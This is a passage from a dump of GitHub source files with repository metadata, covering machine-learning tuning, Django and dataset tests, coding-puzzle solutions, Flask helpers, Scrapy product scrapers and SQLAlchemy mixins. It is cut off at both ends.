Accuracy: %.2f%%\" % (acc * 100))\r\n\r\n# Tune hyperparameters, make list for all values and obtain all possible combinations (long process)\r\nmax_depth = [3, 4, 5]\r\nlearning_rate = [0.05, 0.1, 0.2]\r\nmissing = [None, 0]\r\nn_estimators = [100, 200, 300]\r\nreg_lambda = [0.0, 1.0]\r\nobjective = ['binary:logistic', 'binary:logitraw', 'binary:hinge']\r\n\r\nhyperparameters = []\r\nfor depth, rate, miss, n_estimate, lam, obj in product(max_depth, learning_rate,\r\n missing, n_estimators,\r\n reg_lambda, objective):\r\n hyperparameters.append([depth, rate, miss, n_estimate, lam, obj])\r\n\r\nbest_acc = 0\r\n\r\n# Run through the list of all parameters and find data model with best acc\r\nfor parameter in hyperparameters:\r\n parameters = {'max_depth': parameter[0], 'learning_rate': parameter[1],\r\n 'missing': parameter[2], 'n_estimators': parameter[3],\r\n 'reg_lambda': parameter[4], 'objective': parameter[5]}\r\n\r\n data_model = XGBClassifier(max_depth=parameter[0], learning_rate=parameter[1],\r\n missing=parameter[2], n_estimators=parameter[3],\r\n reg_lambda=parameter[4], objective=parameter[5])\r\n\r\n kfold = KFold()\r\n cross_val_scores = cross_val_score(data_model, x_train, y_train, cv=kfold)\r\n accuracy = cross_val_scores.mean() * 100\r\n\r\n #Check for best accuracy\r\n if best_acc < accuracy:\r\n best_acc = accuracy\r\n best_model = parameters\r\n\r\nprint(\"\\n Best accuracy : \", accuracy)\r\nprint(\"\\n The model with best accuracy : \", best_model)\r\n\r\nprint(\"\\nCross Validation Training Error Rate for the new model: \",1-cross_val_scores.mean())\r\n\r\nprint(\"\\nTest Error Rate for the best model: \",1-best_model.score(x_test, y_test))\r\n","repo_name":"kvk5777/448-Program","sub_path":"Problem5BoostedDecisionTrees.py","file_name":"Problem5BoostedDecisionTrees.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24417808468","text":"import pytest\n\nfrom django.urls import reverse\nfrom django.utils import timezone as tz\n\nfrom music.models import Artist\nfrom radio.models import Radio, Play\n\n\n@pytest.fixture\ndef radio_data():\n radio = Radio.objects.create(name=\"Radio One\", slug=\"radio-one\")\n\n artist = Artist.objects.create(name=\"Gang of four\", slug=\"gang-of-four\")\n\n common = {\"radio\": radio, \"artist\": artist}\n first = Play.objects.create(title=\"Foo\", artist_name=\"Gang of four\", **common)\n Play.objects.create(title=\"Bar\", artist_name=\"Gang of four\", **common)\n last = Play.objects.create(title=\"Baz\", artist_name=\"Gang of four\", **common)\n\n radio.first_play = first\n radio.last_play = last\n radio.play_count = 3\n radio.save()\n\n return radio\n\n\n@pytest.mark.django_db\ndef test_index_view(client, radio_data):\n date = tz.now()\n\n response = client.get(reverse('ui:index'))\n assert response.status_code == 200\n\n content = str(response.content)\n assert '
    Radio One
    ' in content\n assert '3 plays' in content\n assert 'since {:%d.%m.%Y}'.format(date) in content\n assert 'Baz' in content\n assert 'Gang of four' in content\n\n\n@pytest.mark.django_db\ndef test_stats_views(client, radio_data):\n\n response = client.get(reverse('radio:stats'))\n assert response.status_code == 200\n\n response = client.get(reverse('radio:stats', args=[\"radio-one\"]))\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_plays_view(client, radio_data):\n response = client.get(reverse('radio:plays'))\n assert response.status_code == 200\n\n content = str(response.content)\n assert \"Foo\" in content\n assert \"Bar\" in content\n assert \"Baz\" in content\n assert \"Gang of four\" in content\n","repo_name":"ihabunek/radioscraper","sub_path":"radio/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"15158306607","text":"import factory\nimport factory.fuzzy\nfrom spotipy2.types import Album\n\nfrom .artist_factory import ArtistFactory\n\n\nclass AlbumFactory(factory.Factory):\n album_type = factory.Faker(\"sentence\")\n available_markets = factory.Faker(\"country_code\")\n artists = factory.List([factory.SubFactory(ArtistFactory) for _ in range(3)])\n copyrights = factory.Faker(\"sentence\")\n external_ids = factory.Dict({\"spotify\": factory.Faker(\"uuid4\")})\n external_urls = factory.Dict({\"spotify\": factory.Faker(\"uri\")})\n genres = factory.Faker(\"music_subgenre\")\n href = factory.Faker(\"uri\")\n id = factory.Faker(\"lexify\", text=\"??????????????????????\")\n images = factory.List(\n [\n factory.Dict(\n {\n \"href\": factory.Faker(\"uri\"),\n \"height\": factory.Faker(\"random_int\"),\n \"width\": factory.Faker(\"random_int\"),\n }\n )\n ]\n )\n label = factory.Faker(\"random_number\")\n name = factory.Faker(\"name\")\n popularity = factory.Faker(\"random_number\")\n release_date = factory.Faker(\"date\")\n release_date_precision = factory.fuzzy.FuzzyChoice((\"year\", \"month\", \"date\"))\n restrictions = factory.Dict(\n {\"reason\": factory.fuzzy.FuzzyChoice((\"market\", \"product\", \"explicit\"))}\n )\n tracks = []\n type = \"album\"\n uri = factory.Sequence(lambda n: f\"spotify:album:{n}\")\n\n class Meta:\n model = Album\n inline_args = (\n \"album_type\",\n \"artists\",\n \"available_markets\",\n \"copyrights\",\n \"external_ids\",\n \"external_urls\",\n \"genres\",\n \"href\",\n \"id\",\n \"images\",\n \"label\",\n \"name\",\n \"popularity\",\n \"release_date\",\n \"release_date_precision\",\n \"restrictions\",\n \"tracks\",\n \"type\",\n \"uri\",\n )\n","repo_name":"phucnt1992/PersonaCode","sub_path":"services/django/tests/factories/album_factory.py","file_name":"album_factory.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32321711899","text":"# coding: utf-8\n\nclass Solution:\n # @param airplanes, a list of Interval\n # @return an integer\n def countOfAirplanes(self, airplanes):\n # write your code here\n '''\n 以数据[[1, 10], [2, 3], [5, 8], [4, 7]]为例\n 1. 字典air_status记录某时刻飞机增加或减少1架,1增加,-1减少。\n - a[1], a[2], a[5], a[4] = 1\n - a[10], a[3], a[8], a[7] = -1\n 2. 把全部时刻放在一起排序:[1, 2, 3, 4, 5, 7, 8, 10]\n 3. 遍历步骤2的结果,根据字典加减飞机数目\n '''\n ret = 0\n air_status = {}\n for air in airplanes:\n if air.start not in air_status:\n air_status[air.start] = 1\n else:\n air_status[air.start] += 1\n if air.end not in air_status:\n air_status[air.end] = -1\n else:\n air_status[air.end] -= 1\n time_order = []\n for key in air_status: # Python不像C++有set\n time_order.append(key)\n time_order.sort()\n airs = 0\n for t in time_order:\n airs += air_status[t]\n ret = max(airs, ret)\n return ret\n\n# medium: http://lintcode.com/zh-cn/problem/number-of-airplanes-in-the-sky/\n","repo_name":"yingl/LintCodeInPython","sub_path":"number-of-airplanes-in-the-sky.py","file_name":"number-of-airplanes-in-the-sky.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"31"} +{"seq_id":"177766636","text":"class TrieNode:\n def __init__(self, char):\n\n self.char = char\n self.is_word = False\n self.children = {}\n\n\nclass Trie:\n def __init__(self):\n self.root = TrieNode(\"\")\n\n def insert(self, word):\n\n node = self.root\n\n for char in word:\n if char in node.children:\n node = node.children[char]\n else:\n new_node = TrieNode(char)\n node.children[char] = new_node\n node = new_node\n\n node.is_word = True\n\n def delete(self, word):\n node = self.root\n\n for char in word[:-1]:\n if char in node.children:\n node = node.children[char]\n else:\n return False\n\n if word[-1] in node.children:\n del node.children[word[-1]]\n return True\n else:\n return False\n\n def dfs(self, node, prefix):\n if node.is_word:\n self.output.append(prefix + node.char)\n\n for child in node.children.values():\n self.dfs(child, prefix + node.char)\n\n def query(self, x):\n\n self.output = []\n node = self.root\n\n for char in x:\n if char in node.children:\n node = node.children[char]\n else:\n return []\n\n self.dfs(node, x[:-1])\n\n # to be stored in alphabetical order\n return sorted(self.output)\n","repo_name":"vkumar825/contact-book","sub_path":"src/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73239292568","text":"from cortexmulator.cortexm0lator import CortexM0lator\n\n\nm = CortexM0lator()\n# m.read_hex_data('/mnt/c/Users/konia/Developer/arm_emulator/c_files/b.hex')\n# m.read_hex_data('/Users/Konrad/Developer/Python/arm_emulator/c_files/a.hex')\nm.read_hex_data('./c_files/b.hex')\n\n# print(m.read_memory(0x0000))\n# print(m.read_register('r10'))\n# m.memory.write_register('r10', 0xfafa)\n# print(hex(m.read_register('r10')))\nm.run()\n# print(m.memory._memory)\n","repo_name":"KG5321/arm_emulator","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"7917644455","text":"import csv\nimport datetime\nimport re\nimport json\nimport icalendar\nimport io\nfrom flask import current_app, escape, make_response\nimport pytz\nimport types\n\ndef time_print(pgdt, fmt):\n \"\"\" Collect local time zone based printing in one place, expects one of our timezoneless UTC based times from postgres \"\"\"\n tz = pytz.timezone(current_app.config['UI_TIME_ZONE'])\n return pgdt.astimezone(datetime.timezone.utc).astimezone(tz).strftime(fmt)\n\n\nclass JSONEncoderX(json.JSONEncoder):\n \"\"\" Helper for some special cases \"\"\"\n def default(self, o):\n if hasattr(o, 'getAsDict'):\n return o.getAsDict()\n if isinstance(o, (set, types.GeneratorType)):\n return list(o)\n else:\n return str(o)\n\ndef to_json(obj):\n return JSONEncoderX().encode(obj)\n\ndef json_encode(data):\n response = make_response(to_json(data))\n response.headers['Content-type'] = 'application/json'\n return response\n\ndef ical_encode(data):\n response = make_response(ICalEncoder().encodeevents(data))\n response.headers['Content-type'] = 'text/calendar'\n return response\n\ndef csv_encode(filename, fields, data):\n buf = io.StringIO()\n csvw = csv.DictWriter(buf, fields, extrasaction='ignore')\n csvw.writeheader()\n csvw.writerows(data)\n response = make_response(buf.getvalue())\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}.csv\".format(filename)\n response.headers[\"Content-Type\"] = \"text/csv\"\n return response\n\nclass ICalEncoder():\n def encodeevents(self, data):\n cal = icalendar.Calendar()\n cal.add('prodid', '-//Scorekeeper Registration')\n cal.add('version', '2.0')\n cal.add('x-wr-calname;value=text', 'Scorekeeper Registration')\n cal.add('method', 'publish');\n for date, events in sorted(data.items()):\n for (series, name), reglist in sorted(events.items()):\n codes = [reg.classcode for reg in reglist]\n event = icalendar.Event()\n event.add('summary', \"%s: %s\" % (name, ','.join(codes)))\n event.add('dtstart', date)\n event['uid'] = 'SCOREKEEPER-CALENDAR-%s-%s' % (re.sub(r'\\W','', name), date)\n cal.add_component(event)\n return cal.to_ical()\n\n\n","repo_name":"drytoastman/scorekeeperbackend","sub_path":"web/nwrsc/lib/encoding.py","file_name":"encoding.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"30672655817","text":"# create a class programmer for storing info of\r\n# few programmers working at microsoft\r\n\r\nclass Programmer:\r\n company = \"Microsoft\"\r\n \r\n def __init__(self,name,product):\r\n self.name = name\r\n self.product = product\r\n \r\n def getInfo(self):\r\n print(f\"Company Name is {self.company}\")\r\n print(f\"Programmer name is {self.name}\")\r\n print(f\"He/She working on {self.product}\") \r\n\r\n\r\nmrd = Programmer(\"Mahadi Rahman Dhrubo\",\"Software Engineer\")\r\nmrd.getInfo()\r\n\r\nprint(\"\\n\")\r\n\r\nsrs = Programmer(\"Sadia Rahman Shanta\",\"UI/UX Designer\")\r\nsrs.getInfo()\r\n\r\n","repo_name":"MahadiRahman262523/Python_Code_Part-1","sub_path":"practice_problem-1.py","file_name":"practice_problem-1.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17544237163","text":"from test1.models import Questions, MLdata\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport pickle\r\nimport scipy\r\n\r\n##Step 1: Read CSV File\r\n#df = pd.read_csv(\"test1/MachinelearningAlgorithms/MachineLearningDataSet.csv\", encoding='cp1252')\r\n#print(df.columns)\r\n\r\n#features = ['index','title','slug','author','updated_on','body','created_on','status','tags','views','answers','upvotes','downvotes','isanswered','isclosed']\r\ndef combine_features(row):\r\n\treturn str(row['index']) + \" \" + row['title'] + \" \" + row['slug'] + \" \" + row[\"author\"] + \" \" + str(row[\"updated_on\"]) + \" \" + str(row['body']) + \" \" + str(row['created_on']) + \" \" + str(row[\"status\"]) + \" \" + row[\"tags\"] + \" \" + str(row['views']) + \" \" + str(row['answers']) + \" \" + str(row[\"upvotes\"]) + \" \" + str(row[\"downvotes\"]) + \" \" + str(row[\"isanswered\"]) + \" \" + str(row['isclosed'])\r\n#df[\"combined_features\"] = df.apply(combine_features,axis=1)\r\n#print(\"Combined Features:\", df[\"combined_features\"].head())\r\n#cv = CountVectorizer()\r\n#count_matrix = cv.fit_transform(df[\"combined_features\"])\r\n#pickle.dump(count_matrix, open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'wb'))\r\n\r\n\r\ndef RetrainModel():\r\n loaded_model = pickle.load(open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'rb'))\r\n df2 = pd.read_csv(\"test1/MachineLearningAlgorithms/MachineLearningDataSet2.csv\", encoding='cp1252')\r\n df2[\"combined_features\"] = df2.apply(combine_features,axis=1)\r\n if loaded_model is None:\r\n\t temp_model = loaded_model\r\n else:\r\n cv = CountVectorizer()\r\n prd = cv.fit_transform(df2[\"combined_features\"])\r\n print(prd.shape)\r\n print(loaded_model.shape)\r\n diff_n_rows = loaded_model.shape[0] - prd.shape[0]\r\n prd_new = scipy.sparse.vstack((prd, scipy.sparse.csr_matrix ((diff_n_rows,(prd.shape[1])))))\r\n temp_model_one = scipy.sparse.hstack((loaded_model, prd_new))\r\n diff_n_rows2 = temp_model_one.shape[1] - prd.shape[1]\r\n prd_new_left = scipy.sparse.hstack((prd, scipy.sparse.csr_matrix (((prd.shape[0]),diff_n_rows2))))\r\n temp_model = scipy.sparse.vstack((prd_new_left, temp_model_one))\r\n print(temp_model.shape)\r\n pickle.dump(temp_model, open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'wb'))\r\n return True\r\n\r\ndef InitialLoad(question_index):\r\n question_ids = []\r\n loaded_model = pickle.load(open('test1/MachineLearningAlgorithms/Trained_AI_Model.sav', 'rb'))\r\n print(loaded_model.shape)\r\n cosine_sim = cosine_similarity(loaded_model)\r\n similar_questions = list(enumerate(cosine_sim[question_index]))\r\n sorted_similar_questions = sorted(similar_questions, key=lambda x: x[1], reverse=True)\r\n for element in sorted_similar_questions:\r\n question_ids.append(get_index_from_id(element[0]))\r\n return question_ids\r\n\r\n\r\ndef get_index_from_id(id):\r\n mldata = MLdata.objects.filter(ML_id = id)\r\n return mldata[0].index","repo_name":"chandusanjith/Abendv2","sub_path":"main/MachineLearningAlgorithms/TrainAI.py","file_name":"TrainAI.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25582769539","text":"# List to be in sorted order\n# Example of Divide and Conquer\ndef binarySearch(list,n):\n\tfirst = 0\n\tlast = len(list)-1\n\tfound = False\n\n\twhile first<=last and not found:\n\t\tmp = (first+last)//2\n\t\tif list[mp] == n:\n\t\t\tfound =True\n\t\telse:\n\t\t\tif n < list[mp]:\n\t\t\t\tlast = mp-1\n\t\t\telse:\n\t\t\t\tfirst = mp+1\n\treturn found\n\nlist = [1, 4, 6, 10, 15, 17, 20]\nprint(binarySearch(list,15)) # True\nprint(binarySearch(list, 2)) # False","repo_name":"Sbk3824/Algorithms-","sub_path":"binarySearch.py","file_name":"binarySearch.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21716179770","text":"import os\n\nimport numpy as np\nimport pytest\n\nfrom dgp.annotations.bounding_box_2d_annotation import (\n BoundingBox2DAnnotationList,\n)\nfrom dgp.datasets.synchronized_dataset import SynchronizedSceneDataset\nfrom dgp.utils.structures.bounding_box_2d import BoundingBox2D\nfrom tests import TEST_DATA_DIR\nfrom tests.annotation.test_ontology import get_ontology\n\n\n@pytest.fixture\ndef bb_ontology():\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(DGP_TEST_DATASET_DIR, \"test_scene\", \"scene_dataset_v1.0.json\")\n return get_ontology(scene_dataset_json=scenes_dataset_json, annotation_type=\"bounding_box_3d\")\n\n\ndef test_bb2d_annotation(bb_ontology):\n bounding_boxes = [BoundingBox2D(box=np.float32([i, i + 5, i, i + 5])) for i in range(5)]\n annotation_list = BoundingBox2DAnnotationList(bb_ontology, bounding_boxes)\n assert len(annotation_list.ltrb) == 5\n\n\ndef test_bb2d_load(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n expected_output = [[0., 581., 185., 652.], [149., 564., 299., 641.], [313., 573., 425., 627.],\n [1334., 531., 1655., 745.], [1559., 577., 1850., 726.], [717., 367., 1494., 1021.],\n [1232., 516., 1460., 681.], [1218., 553., 1362., 656.], [1199., 562., 1324., 643.],\n [1185., 555., 1292., 645.], [1175., 564., 1264., 633.], [1158., 549., 1232., 607.],\n [317., 556., 490., 652.], [196., 538., 395., 642.], [551., 525., 722., 610.],\n [831., 550., 917., 611.], [1213., 553., 1268., 595.], [493., 563., 654., 640.],\n [1470., 569., 1684., 700.], [396., 569., 502., 604.], [323., 569., 429., 602.],\n [289., 568., 393., 601.], [264., 568., 367., 601.], [533., 574., 547., 608.]]\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n assert (bb2d_list.ltrb == expected_output).all()\n\n\ndef test_bb2d_proto(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n ouput_proto = bb2d_list.to_proto()\n assert ouput_proto.__sizeof__() == 80\n\n\ndef test_bb2d_save(bb_ontology):\n DGP_TEST_DATASET_DIR = os.path.join(TEST_DATA_DIR, \"dgp\")\n scenes_dataset_json = os.path.join(\n DGP_TEST_DATASET_DIR, \"test_scene/scene_01/bounding_box_2d/CAMERA_01/15569195938203752.json\"\n )\n bb2d_list = BoundingBox2DAnnotationList.load(scenes_dataset_json, bb_ontology)\n bb2d_list.save(\".\")\n filepath = \"./219f294449ae6c01f62b6fa1d68949ee2b51ebd8.json\"\n assert os.path.exists(filepath)\n os.remove(filepath)\n","repo_name":"TRI-ML/dgp","sub_path":"tests/annotation/test_bounding_box_2d_annotation.py","file_name":"test_bounding_box_2d_annotation.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"31"} +{"seq_id":"70302160088","text":"\"\"\"\nGiven an array nums containing n distinct numbers in the range [0, n], return the only number in the range that is missing from the array.\n\nFollow up: Could you implement a solution using only O(1) extra space complexity and O(n) runtime complexity?\n\"\"\"\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n ans = 0\n for i, a in enumerate(nums):\n ans += a - i\n return len(nums) - ans","repo_name":"maciejdomagala/thegreatUpsolving","sub_path":"various/MissingNumber.py","file_name":"MissingNumber.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17270188036","text":"from moteur import ( etapes, parades, attaques, bottes, cartes, getNombreTotalCartes, \n mapClassCarteConcerteToDictObjectsCarteConcrete)\nfrom moteur.classes import *\nfrom flask import Blueprint, render_template, g, url_for\nfrom milleBornes import makeTransparentEmptyImageByHeight, resizeImage, getFileNameFromObjectCarte\n\n#from lorem_text import lorem\n\nbp = Blueprint('listeCartes', __name__)\n\n# Calculs divers\n# --------------\n\ndef getTitle():\n title = url_for('listeCartes.listeCartes')\n title = title.split('/')\n title = title[len(title)-1]\n title = title.replace('-', ' ')\n return title\n\n\n\ndef maxLen(typeCarte): # typeCarte est 1 des sous-classes contrète de Carte: Etape, Parade ...\n #mapping={Attaque: attaques, Parade: parades, Etape: etapes, Botte: bottes}\n res=0\n for c in mapClassCarteConcerteToDictObjectsCarteConcrete[typeCarte].values():\n res=max(res,len(c.nom))\n return res+1\n\n\nclass CarteSansNomSansNombre(PasDeCarte):\n def __init__(self):\n self._nom = ' ' # un espace associé au CSS white-space: pre; pour afficher une contenu vide qui prend la place d'un lettre\n self._nombre = ''\n\n\n# liste de dict à mettre dans g pour faire la page sans aucune chaîne en dur -> variable: html\n# attribut id de
    affichage HTML liste d'objets Carte du type dans l'ordre d'affichage\n# [ { nomId: 'attaques', nomHTML: \"Attaques\", cartes: [ obj(FeuRouge), obj(LimitationDeVitesse)]}, ... les autres types de cartes ]\n\n_ordreCartes= {\n Attaque: (cartes[FeuRouge], cartes[LimitationDeVitesse], cartes[Accident], cartes[Creve], cartes[PanneEssence]),\n Parade: (cartes[FeuVert], cartes[FinDeLimitation], cartes[Reparation], cartes[RoueDeSecours], cartes[Essence]),\n Botte: (cartes[Prioritaire], CarteSansNomSansNombre(), cartes[AsDuVolant], cartes[Increvable], cartes[Citerne]),\n Etape: (cartes[Etape25], cartes[Etape50], cartes[Etape75], cartes[Etape100], cartes[Etape200]),\n}\n\nordreCartes={}\nfor k in _ordreCartes.keys():\n l=[]\n #scale=0.4\n hauteur=45\n for v in _ordreCartes[k]:\n d = {'carte': v, \n 'image': makeTransparentEmptyImageByHeight(hauteur) if isinstance(v,CarteSansNomSansNombre) else resizeImage(v,hauteur) }\n l.append(d)\n ordreCartes.update({k: l})\n\ndel _ordreCartes,k,l,v,d, hauteur\n\nordreTypes=(Attaque, Parade, Botte, Etape)\nnomTypes = {\n Attaque: {'nomId': 'attaques', 'nomHTML': \"Attaques\"},\n Parade: {'nomId': 'parades', 'nomHTML': \"Parades\"},\n Botte: {'nomId': 'bottes', 'nomHTML': \"Bottes\"},\n Etape: {'nomId': 'etapes', 'nomHTML': \"Bornes\"},\n}\n\nhtml=[]\nfor tc in ordreTypes:\n html.append({'nomId': nomTypes[tc]['nomId'],\n 'nomHTML': nomTypes[tc]['nomHTML'],\n 'cartes': ordreCartes[tc],\n 'maxLen': maxLen(tc),\n })\n\ndel ordreCartes, ordreTypes, nomTypes, tc\n\n\n\n\n@bp.route('/Liste-des-cartes')\ndef listeCartes(): \n g.html=html\n #debug: getFileNameFromObjectCarte(html[0]['cartes'][0]['carte'])\n g.title = getTitle()\n g.total = getNombreTotalCartes()\n\n return render_template('listeCartes.j2', getFileNameFromObjectCarte=getFileNameFromObjectCarte)\n","repo_name":"jcd717/1000Bornes","sub_path":"milleBornes/listeCartes.py","file_name":"listeCartes.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74093625688","text":"import re\nfrom datetime import datetime\n\nfrom scrapy import Spider\nfrom scrapy.http import TextResponse\n\nfrom html_parse.productdata import parse as product_data_html_parse\nfrom table_definitions.base import Session\nfrom table_definitions.category import Category\nfrom table_definitions.page import Page\nfrom table_definitions.product import Product\nfrom table_definitions.productdata import ProductData\n\n# https://realpython.com/python-web-scraping-practical-introduction/\n# pip install requests BeautifulSoup4\n# pip install Scrapy\n# pip install sqlalchemy\n\n\nclass CrawlCategory(Spider):\n \"\"\"\n This crawler takes a category for example,\n (https://www.bestwaywholesale.co.uk/soft-drinks) and saves the various\n information required\n \"\"\"\n\n name = \"category\"\n\n # SQLAlchemy category object\n catObject = None\n\n # SQLAlchemy session object\n dbSession = None\n\n def parse(self, response: TextResponse):\n # getting the data required to store in the pages table\n r_url = response.url\n r_page = response.text\n r_time = datetime.now()\n print(__file__, \"CrawCategory.parse()\", \"scraping for pages: {}\".format(r_url))\n # create SQLAlchemy page object\n pge = Page(\n url=r_url, html=r_page, date=r_time, category=CrawlCategory.catObject\n )\n\n # add page object\n CrawlCategory.dbSession.add(pge)\n\n # calculating the url for the next page\n next_page = response.css(\"li.next a\").attrib[\"href\"]\n if next_page is not None:\n yield response.follow(next_page, callback=self.parse)\n\n\nclass crawlProduct(Spider):\n \"\"\"\n This crawler scrapes individual product pages and extracts appropriate information\n \"\"\"\n\n name = \"product\"\n dbSession = None\n\n def parse(self, response: TextResponse):\n # getting data for productdata object\n r_url = response.url\n r_page = response.text\n r_time = datetime.now()\n\n print(\"scraping for productData: {}\".format(r_url))\n\n dct = product_data_html_parse(response.css(\".prodtable\").get())\n remove = False\n try:\n # get price\n r_price = dct[\"RSP\"]\n r_price = \"\".join(\n re.findall(r\"([\\d,.])\", r_price)\n ) # use regex to remove the currency symbol\n\n # get brand\n r_brand = dct['Brand']\n\n # get item name\n r_itemname = response.css(\".productpagedetail-inner .prodname::text\").get()\n\n # get item size\n r_size = dct['Pack Size']\n # r_size = \"\".join(re.findall(r\"([\\d,.])\", r_size))\n except KeyError as e:\n print(e)\n print(\"Missing data, remove \")\n remove = True\n\n # since product and productdata has a 1 to 1 relationship, the url of product and productdata is the same\n # iterate thorugh the product table, find the matching url and create the productdata sqlalchemy object with the product object\n Product_table = crawlProduct.dbSession.query(Product).all()\n for i in Product_table:\n # if there is a matcging url, we found the matching product\n if i.url == r_url:\n # check if any of the scraped data has none values. if true, delete the product entry\n if remove:\n crawlProduct.dbSession.query(Product).filter(\n Product.id == i.id\n ).delete()\n else:\n product_data_object = ProductData(\n url=r_url,\n html=r_page,\n date=r_time,\n price=r_price,\n brand=r_brand,\n itemName=r_itemname,\n size=r_size,\n product=i,\n )\n crawlProduct.dbSession.add(product_data_object)\n crawlProduct.dbSession.commit()\n","repo_name":"zayd62/final-year-project","sub_path":"scrapers.py","file_name":"scrapers.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40453283136","text":"import re\nimport sqlalchemy as sa\nfrom sqlalchemy import inspect\nfrom sqlalchemy.orm.decl_api import DeclarativeMeta, declared_attr\nfrom sqlalchemy.schema import _get_table_key\nfrom typing import Any\nfrom .utils import has_primary_key\n\ncamelcase_re = re.compile(r\"([A-Z]+)(?=[a-z0-9])\")\n\n\ndef camel_to_snake_case(name):\n def _join(match):\n word = match.group()\n if len(word) > 1:\n return (\"_%s_%s\" % (word[:-1], word[-1])).lower()\n return \"_\" + word.lower()\n\n return camelcase_re.sub(_join, name).lstrip(\"_\")\n\n\ndef should_set_tablename(cls):\n \"\"\"Determine whether ``__tablename__`` should be automatically generated\n for a model.\n\n * If no class in the MRO sets a name, one should be generated.\n * If a table prefix (__table_prefix__) is specified,\n * If a declared attr is found, it should be used instead.\n * If a name is found, it should be used if the class is a mixin, otherwise\n one should be generated.\n * Abstract models should not have one generated.\n\n Later, :meth:`._BoundDeclarativeMeta.__table_cls__` will determine if the\n model looks like single or joined-table inheritance. If no primary key is\n found, the name will be unset.\n \"\"\"\n if cls.__dict__.get(\"__abstract__\", False) or not any(\n isinstance(b, DeclarativeMeta) for b in cls.__mro__[1:]\n ):\n return False\n\n for base in cls.__mro__:\n if \"__tablename__\" not in base.__dict__:\n continue\n if isinstance(base.__dict__[\"__tablename__\"], declared_attr):\n return False\n if \"__table_prefix__\" in base.__dict__:\n return True\n return not (\n base is cls\n or base.__dict__.get(\"__abstract__\", False)\n or not isinstance(base, DeclarativeMeta)\n )\n\n return True\n\n\nclass AutoBigIntegerIdentifierMetaMixin(object):\n \"\"\"\n A meta class for auto-generating `BigInteger` primary key columns on models.\n \"\"\"\n\n def __init__(\n cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n ) -> None:\n \"\"\" \"\"\"\n #: Check to see if the class has at least one primary key defined. If\n #: not, automatically generate one.\n has_primary = has_primary_key(cls)\n\n if not has_primary:\n cls.__dict__.update(\n {\"id\": sa.Column(\"id\", sa.BigInteger, nullable=False, primary_key=True)}\n )\n cls.__dict__[\"id\"]._creation_order = 1\n\n dict_.update(\n {\"id\": sa.Column(\"id\", sa.BigInteger, nullable=False, primary_key=True)}\n )\n dict_[\"id\"]._creation_order = 1\n super().__init__(classname, bases, dict_)\n\n\nclass BindMetaMixin(object):\n \"\"\" \"\"\"\n\n def __init__(\n cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n ) -> None:\n bind_key = dict_.pop(\"__bind_key__\", None) or getattr(cls, \"__bind_key__\", None)\n\n super().__init__(classname, bases, dict_)\n\n if bind_key is not None and getattr(cls, \"__table__\", None) is not None:\n cls.__table__.info[\"bind_key\"] = bind_key\n\n\nclass NameMetaMixin(object):\n \"\"\" \"\"\"\n\n def __init__(\n cls, classname: str, bases: tuple[type[Any], ...], dict_: dict[str, Any]\n ) -> None:\n if should_set_tablename(cls):\n table_name = camel_to_snake_case(cls.__name__)\n #: If a table prefix is specified, overwrite the `table_name` with\n #: one that contains both the prefix and the name of the table.\n if 